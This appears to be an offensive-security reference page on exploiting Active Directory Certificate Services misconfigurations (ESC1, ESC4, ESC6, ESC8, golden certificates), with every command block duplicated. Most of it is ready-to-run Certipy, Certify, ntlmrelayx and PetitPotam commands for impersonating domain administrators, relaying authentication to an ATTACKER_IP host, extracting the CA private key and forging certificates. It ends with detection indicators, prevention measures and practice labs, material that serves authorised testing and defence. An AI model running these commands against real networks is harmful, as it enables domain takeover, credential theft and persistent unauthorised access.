Exploitation

ADCS Attacks

Exploit Active Directory Certificate Services misconfigurations to escalate privileges, forge certificates, and establish persistent access to domain resources.

T1649 T1556 T1484

Danger

ADCS attacks can provide long-term persistence. Golden certificates can remain valid for years. Document all certificates obtained and coordinate revocation with the client.

Tool Installation

Certipy

Python ADCS toolkit

pip install certipy-ad

Certify

C# ADCS tool

github.com/GhostPack/Certify

ForgeCert

Forge certificates

github.com/GhostPack/ForgeCert

PassTheCert

PKINIT authentication

github.com/AlmondOffSec

ADCS Enumeration

Find Certificate Authorities

bash 
# Certipy - Find vulnerable templates
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable

# Certify - Enumerate from Windows
Certify.exe find
Certify.exe find /vulnerable
Certify.exe find /enrolleeSuppliesSubject

# PowerShell - Find CA
certutil -config - -ping
Get-ADObject -Filter 'objectClass -eq "pKIEnrollmentService"' -SearchBase "CN=Configuration,DC=corp,DC=local"
# Certipy - Find vulnerable templates
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable

# Certify - Enumerate from Windows
Certify.exe find
Certify.exe find /vulnerable
Certify.exe find /enrolleeSuppliesSubject

# PowerShell - Find CA
certutil -config - -ping
Get-ADObject -Filter 'objectClass -eq "pKIEnrollmentService"' -SearchBase "CN=Configuration,DC=corp,DC=local"

ESC1 - Misconfigured Certificate Templates

ESC1 allows low-privileged users to request certificates for any user by specifying an alternate Subject Alternative Name (SAN).

Information

Vulnerable conditions: Template allows enrollment by low-privileged users + ENROLLEE_SUPPLIES_SUBJECT flag enabled + Certificate can be used for authentication.
bash 
# Certipy - Request certificate as Domain Admin
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

# Authenticate with the certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Certify - Request from Windows
Certify.exe request /ca:CORP-CA /template:VulnTemplate /altname:administrator
# Certipy - Request certificate as Domain Admin
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

# Authenticate with the certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Certify - Request from Windows
Certify.exe request /ca:CORP-CA /template:VulnTemplate /altname:administrator

ESC4 - Vulnerable ACLs on Templates

If a user has write access to a certificate template, they can modify it to enable ESC1.

bash 
# Check template ACLs
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable

# Modify template to enable ESC1
# Add ENROLLEE_SUPPLIES_SUBJECT and change EKU to Client Authentication
certipy template -u user@corp.local -p 'Password123' -template VulnTemplate -save-old

# Now exploit as ESC1
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template VulnTemplate -upn administrator@corp.local
# Check template ACLs
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable

# Modify template to enable ESC1
# Add ENROLLEE_SUPPLIES_SUBJECT and change EKU to Client Authentication
certipy template -u user@corp.local -p 'Password123' -template VulnTemplate -save-old

# Now exploit as ESC1
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

If the CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled, any template can be used for privilege escalation.

bash 
# Check if flag is enabled
certutil -config "CA_NAME\CA" -getreg policy\EditFlags

# If enabled, exploit any template
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template User -upn administrator@corp.local
# Check if flag is enabled
certutil -config "CA_NAME\CA" -getreg policy\EditFlags

# If enabled, exploit any template
certipy req -u user@corp.local -p 'Password123' -ca CORP-CA -template User -upn administrator@corp.local

ESC8 - NTLM Relay to HTTP Endpoints

Relay NTLM authentication to AD CS Web Enrollment endpoints to obtain certificates.

bash 
# Start ntlmrelayx targeting web enrollment
ntlmrelayx.py -t http://ca-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Trigger authentication (e.g., PetitPotam)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Use obtained certificate
certipy auth -pfx dc.pfx -dc-ip 10.10.10.10
# Start ntlmrelayx targeting web enrollment
ntlmrelayx.py -t http://ca-server/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Trigger authentication (e.g., PetitPotam)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# Use obtained certificate
certipy auth -pfx dc.pfx -dc-ip 10.10.10.10

Golden Certificate

With access to CA private key, forge certificates for any user - similar to Golden Ticket but for PKI.

bash 
# Extract CA private key (requires DA or CA admin)
certipy ca -backup -u admin@corp.local -p 'Password123' -ca CORP-CA

# Forge certificate for any user
certipy forge -ca-pfx ca.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'

# Authenticate with forged certificate
certipy auth -pfx forged.pfx -dc-ip 10.10.10.10
# Extract CA private key (requires DA or CA admin)
certipy ca -backup -u admin@corp.local -p 'Password123' -ca CORP-CA

# Forge certificate for any user
certipy forge -ca-pfx ca.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'

# Authenticate with forged certificate
certipy auth -pfx forged.pfx -dc-ip 10.10.10.10

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • • Event 4886 - Certificate request received
  • • Event 4887 - Certificate issued
  • • Event 4768/4769 - Kerberos authentication with certificate
  • • Monitor for SAN containing high-value accounts
  • • Unusual certificate template usage

Prevention Measures

  • • Audit certificate templates for misconfigurations
  • • Remove ENROLLEE_SUPPLIES_SUBJECT where not needed
  • • Require manager approval for sensitive templates
  • • Disable HTTP enrollment (use HTTPS only)
  • • Enable EPA on web enrollment

ESC Vulnerability Reference

ESC Vulnerability Requirements
ESC1Enrollee supplies subjectTemplate enrollment + SAN flag
ESC2Any purpose EKUTemplate with Any Purpose or no EKU
ESC3Enrollment agent templateCertificate Request Agent EKU
ESC4Template ACL abuseWrite access to template
ESC5PKI object controlControl over PKI AD objects
ESC6EDITF flag enabledCA config allows user SAN
ESC7CA ACL abuseManageCA or ManageCertificates rights
ESC8NTLM relay to HTTPWeb enrollment without EPA

External Resources

Certified Pre-Owned - SpecterOps

Original ADCS research whitepaper

Certipy - GitHub

Python ADCS exploitation tool

HackTricks - AD Certificates

Comprehensive ADCS attack reference

Certify - GitHub

C# ADCS enumeration and abuse
🎯

Practice Labs

Practice ADCS attacks in safe environments

📦
Escape Hack The Box medium
ADCSESC1Certificate Auth
Open Lab
📦
Certified Hack The Box medium
ADCSESC7Golden Certificate
Open Lab
📦
Timelapse Hack The Box easy
Certificate AuthLAPS
Open Lab
🏠
AD CS TryHackMe hard
ADCS IntroESC1-ESC8
Open Lab
Need help setting up? Check our Lab Setup Guide →

Related Topics

AD Exploitation

Other AD attack techniques

Shadow Credentials

KeyCredentialLink abuse

AD Attack Paths

Deep dive into AD attacks